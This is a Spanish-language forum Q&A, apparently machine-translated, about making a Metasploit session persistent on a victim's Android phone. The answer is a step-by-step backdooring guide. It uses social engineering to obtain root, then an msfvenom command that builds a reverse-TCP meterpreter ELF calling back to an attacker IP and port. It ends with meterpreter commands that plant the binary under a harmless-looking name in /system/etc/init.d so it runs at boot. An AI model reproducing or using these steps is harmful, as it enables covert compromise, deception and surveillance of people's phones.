En kali linux 2.0, cuando ejecuto exploit
en msfconsole y la víctima abre mi carga, ¿cómo puedo forzar la sesión para que sea persistente?
En kali linux 2.0, cuando ejecuto exploit
en msfconsole y la víctima abre mi carga, ¿cómo puedo forzar la sesión para que sea persistente?
Para las plataformas de Android, al usar el proyecto metasploit-framework, necesitará utilizar meterpreter como una instalación de APK para establecer la persistencia.
La descarga de android está disponible aquí: enlace
Puede encontrar una publicación más detallada que explica todas las dependencias aquí - enlace
En parte, un resumen de lo que ya se ha dicho:
1) Compruebe si el objetivo ha enraizado su teléfono . Si lo ha hecho, use la ingeniería social para solicitar privilegios de superusuario a través de un aviso con
Runtime.getRuntime().exec("su");
Y usa el proceso raíz para realizar los pasos 5 y 6
2) De lo contrario, busque un exploit, por ejemplo, vaya aquí y desplácese hacia abajo a Android .
2.5) Espero que el objetivo ignore el "Nuevo software disponible!" pedir a menudo
3) Elevar los privilegios de su sesión a la raíz. Si no puedes, no hay suerte. Espero que cargue bien su teléfono.
4) Cree un binario ELF que se ejecutará al inicio
msfvenom -p android/meterpreter/reverse_tcp -f elf LHOST= 192.168.43.107 LPORT=4444 R > /root/backdoor.elf
5) Cópielo en la ubicación remota con un nombre normal (mountsd)
meterpreter> upload backdoor.elf /system/etc/init.d/92mountsd.elf
6) Ejecutarlo (o esperar a que se reinicie)
meterpreter> execute /system/etc/init.d/92mountsd.elf
Lea otras preguntas en las etiquetas metasploit